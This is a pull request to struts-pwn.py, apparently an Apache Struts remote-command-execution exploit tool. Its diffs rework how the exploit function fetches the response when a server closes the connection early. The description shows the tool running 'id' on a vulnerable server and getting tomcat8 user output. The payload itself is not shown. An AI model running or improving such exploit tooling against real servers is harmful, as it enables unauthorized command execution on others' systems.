### PR TITLE
Adjusted content fetch to handle server prematurely closing connection

### DIFF
--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -101,7 +101,7 @@ def exploit(url, cmd):
                     output += i
         except requests.exceptions.ChunkedEncodingError as e:
             print("EXCEPTION::::--> " + str(e))
-            print("Note: Server Connection Closed Prematurely")
+            print("Note: Server Connection Closed Prematurely\n")
     except Exception as e:
         print("EXCEPTION::::--> " + str(e))
         output = 'ERROR'

--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -92,7 +92,14 @@ def exploit(url, cmd):
 
     timeout = 3
     try:
-        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
+        output = ""
+        with requests.get(url, headers=headers, timeout=timeout, allow_redirects=False, stream=True) as resp:
+            for i in resp.iter_content():
+                output += i
+    except requests.exceptions.ChunkedEncodingError as e:
+        print("EXCEPTION::::--> " + str(e))
+        print("Note: Server Connection Closed Prematurely")
+        print("")
     except Exception as e:
         print("EXCEPTION::::--> " + str(e))
         output = 'ERROR'

--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -92,14 +92,16 @@ def exploit(url, cmd):
 
     timeout = 3
     try:
-        output = ""
-        with requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False, stream=True) as resp:
-            for i in resp.iter_content(decode_unicode=True):
-                output += i
-    except requests.exceptions.ChunkedEncodingError as e:
-        print("EXCEPTION::::--> " + str(e))
-        print("Note: Server Connection Closed Prematurely")
-        print("")
+        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
+    except requests.exceptions.ChunkedEncodingError:
+        try:
+            output = ""
+            with requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False, stream=True) as resp:
+                for i in resp.iter_content(decode_unicode=True):
+                    output += i
+        except requests.exceptions.ChunkedEncodingError as e:
+            print("EXCEPTION::::--> " + str(e))
+            print("Note: Server Connection Closed Prematurely")
     except Exception as e:
         print("EXCEPTION::::--> " + str(e))
         output = 'ERROR'

--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -93,7 +93,7 @@ def exploit(url, cmd):
     timeout = 3
     try:
         output = ""
-        with requests.get(url, headers=headers, timeout=timeout, allow_redirects=False, stream=True) as resp:
+        with requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False, stream=True) as resp:
             for i in resp.iter_content(decode_unicode=True):
                 output += i
     except requests.exceptions.ChunkedEncodingError as e:

--- a/struts-pwn.py
+++ b/struts-pwn.py
@@ -94,7 +94,7 @@ def exploit(url, cmd):
     try:
         output = ""
         with requests.get(url, headers=headers, timeout=timeout, allow_redirects=False, stream=True) as resp:
-            for i in resp.iter_content():
+            for i in resp.iter_content(decode_unicode=True):
                 output += i
     except requests.exceptions.ChunkedEncodingError as e:
         print("EXCEPTION::::--> " + str(e))


### PR DESCRIPTION
Fix for https://github.com/mazen160/struts-pwn/issues/8
Content is fetched as a stream and `decode_unicode=True` handles unicode decoding in the same manner as `.text`. 

Output for the vulnerable server will now display:
```bash
root@kali:~/Desktop/struts-pwn# python struts-pwn.py --url http://x.x.x.x/test.action

[*] URL: http://x.x.x.x/test.action
[*] CMD: id
EXCEPTION::::--> ('Connection broken: IncompleteRead(0 bytes read)', IncompleteRead(0 bytes read))
Note: Server Connection Closed Prematurely

uid=115(tomcat8) gid=119(tomcat8) groups=119(tomcat8)

[%] Done.

```